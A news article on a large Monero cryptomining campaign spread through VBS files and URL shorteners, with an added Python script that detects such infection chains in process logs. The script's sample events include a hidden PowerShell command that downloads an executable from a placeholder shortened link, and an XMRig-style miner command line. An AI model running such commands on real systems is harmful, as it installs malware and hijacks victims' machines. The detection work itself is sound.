Cryptocurrency mining scam catches 15m people out
A large-scale cryptocurrency mining scam that’s been running undetected for over four months has affected more than 15 million people worldwide, according to research by Palo Alto Networks.
Palo Alto says the operation attempts to take over people’s computers to run software that generates or mines the Monero cryptocurrency using the open-source XMRig utility.
The cyber criminals then pocket the Monero cryptocurrency mined by the victim.
Palo Alto’s Unit 42 has observed a large-scale operation that has been active for over four months and mines Monero via the open-source XMRig utility.
Based on publicly available telemetry data from bitly, Unit 42 estimates that roughly 15 million people worldwide have been affected by this operation. The same telemetry shows which regions the campaign hits hardest: southeast Asia, northern Africa and South America.
However, Palo Alto says it’s “important to note that the actual number of victims is likely much higher because less than half of the samples we identified in this campaign leverage bitly”.
If the bitly telemetry is assumed to be typical of the operation as a whole, Unit 42 extrapolates that as many as 30 million people may have been affected.
The attackers make heavy use of VBS files and various online URL shortening services to install and run the XMRig payload. Additionally, they conceal the wallet addresses in use by routing the miners through XMRig proxy services on the hosts they connect to.
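The infection chain described above (a VBS script host that fetches a payload via a URL shortener and then runs XMRig-style miner arguments) can be hunted for in endpoint process-creation logs. The following is an added example, not code from Palo Alto or the Unit 42 report; the log events, the shortener list beyond bitly and the miner markers are constructed assumptions, and it deliberately avoids relying on wallet addresses, which this campaign hides behind XMRig proxies.

```python
import re

# Constructed sample process-creation events (hypothetical; not from the report).
SAMPLE_EVENTS = [
    {"pid": 101, "ppid": 7,   "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\AppData\Local\Temp\update.vbs"},
    {"pid": 102, "ppid": 101, "image": "powershell.exe",
     "cmdline": "powershell -w hidden -c (New-Object Net.WebClient)"
                ".DownloadFile('https://bit.ly/PLACEHOLDER','svc.exe')"},
    {"pid": 103, "ppid": 101, "image": "svc.exe",
     "cmdline": "svc.exe -o stratum+tcp://proxy.example:3333 -u worker1 -k --donate-level=1"},
    {"pid": 200, "ppid": 7,   "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 201, "ppid": 200, "image": "powershell.exe",
     "cmdline": "powershell -c Get-Date"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# The report names only bitly; the other shorteners here are an assumption for illustration.
SHORTENER_RE = re.compile(r"https?://(bit\.ly|tinyurl\.com|goo\.gl|t\.co)/", re.I)
# Behavioural markers of an XMRig-style miner (binary name, stratum pool URI, donate flag).
# Wallet addresses are not used: the campaign masks them behind XMRig proxy hosts.
MINER_RE = re.compile(r"xmrig|stratum\+tcp://|--donate-level", re.I)

def tag_event(ev):
    """Tag one process-creation event with the behaviours it exhibits."""
    tags = set()
    if ev["image"].lower() in SCRIPT_HOSTS and ".vbs" in ev["cmdline"].lower():
        tags.add("vbs-launch")
    if SHORTENER_RE.search(ev["cmdline"]):
        tags.add("shortener-fetch")
    if MINER_RE.search(ev["cmdline"]):
        tags.add("miner-args")
    return tags

def find_mining_chains(events):
    """Return {child_pid: sorted tags} for processes spawned by a VBS script host
    that either fetch through a URL shortener or carry miner arguments."""
    by_pid = {ev["pid"]: ev for ev in events}
    hits = {}
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        if parent is None or "vbs-launch" not in tag_event(parent):
            continue
        tags = tag_event(ev) & {"shortener-fetch", "miner-args"}
        if tags:
            hits[ev["pid"]] = sorted(tags)
    return hits

if __name__ == "__main__":
    print(find_mining_chains(SAMPLE_EVENTS))  # {102: ['shortener-fetch'], 103: ['miner-args']}
```

The parent-child requirement is what keeps ordinary PowerShell or legitimate shortener use (event 201) out of the results; a wallet-based indicator would miss this campaign entirely because of the proxy layer.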
It says Monero mining campaigns are “certainly not a new development, as there have been various reported instances recently” but it is “less common to observe such a large-scale campaign go relatively unnoticed for such a long period of time”.
Palo Alto points out that its customers are protected against this threat: all URLs used by the malware have been flagged as malicious, and all samples observed have been classified as malicious within WildFire, its cloud-based threat analysis service.
If all this hasn’t put you off, you can read an opinion piece on “What cryptocurrency trends can we expect in 2018?”.